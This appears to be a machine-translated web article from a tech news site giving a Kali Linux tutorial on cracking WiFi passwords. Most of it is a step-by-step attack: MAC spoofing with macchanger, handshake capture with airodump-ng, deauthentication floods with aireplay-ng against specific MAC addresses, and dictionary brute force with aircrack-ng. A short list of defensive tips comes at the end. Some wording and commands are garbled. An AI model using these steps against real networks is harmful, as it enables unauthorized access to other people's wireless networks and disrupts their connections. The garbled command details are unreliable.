Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Cracking the Wireless password of kali

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Wireless encryption method:

1, WEP(Limited Equivalent Encryption)-using WEP64-bit or 128-bit data encryption is currently relatively poor

2. WPA-PSK{TKIP}-Pre-shared WIFI protection access, WPA-PSK standard encryption technology, encryption type TKIP

3. WPA2-PSK[AES]-WIFI protected access with pre-shared key (version 2), using WPA2-PSK standard encryption technology, encryption type AES

WPA-PSK[TKIP]+WPA-PSK [AES]-Allows clients to use WPA-PSK[TKIP] or WPA2-PSK[AES]

5. WAPI-Wireless local area network authentication and protection infrastructure, encryption technology supported by China, is the security mechanism in the mandatory standard of Chinese wireless local area network

Global wireless local area network on two U.S. IE802.11 China's WAPI, the current mainstream WPA2-PSK

Step 1: Bridging Wireless Network Cards

Step 2: Check the network card information

Step 3: Start modifying NIC promiscuous mode

root@localhost:~# airmon-ng stop wlan0 Turn off the wireless adapter

root@localhost:~# macchanger --mac 00:11:22:33:44:55 wlan0 Modify MAC address of wireless card

root@kali:~# airmon-ng start wlan0 Enable wireless adapter

Step 4: Search for wireless signals Ctrl+c Stop searching

root@localhost:~#airodump-ng mon0 Scan for wireless signals

Step 5: Capture handshake information

root@localhost:~#airodump-ng -c 8 -w maguangjie --bssid C8:3A:35:58:12:C8 mon0

-c is the channel-w is to save the packet name and path this time saved in/root bssid wireless router mac address by default

Step 6: Flooding *** Wireless

root@localhost:~#aireplay-ng -0 100 -a C8:3A:35:58:12:C8 -c 00:0f:10:00:a6:61 mon0

root@localhost:~# aireplay-ng --deaut 100000 -a E8:65:D4:5B:2F:30 -c 60:36:DD:A6:18:D2 mon0 --ignore-negative-one

Step 7: handshake information (handshake 0 means no packet is caught)

Step 8: Upload Password Dictionary

Step 9: Brute force cracking

root@localhost:~# aircrack-ng -w /root/mi maguangjie-*.ca # -w Specify the path to dictionary/root/mi

Step 10: Get the password

How to defend against WIFI cracking

1、. Disable SSID broadcast, hide wireless router name

2. Binding MAC address

3, set WPA2-PSK password connection, try to set the password complex, prolong the time of cracking the password

4. Do not "jailbreak" or ROOT mobile devices, and do not connect to wireless networks of unknown origin.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report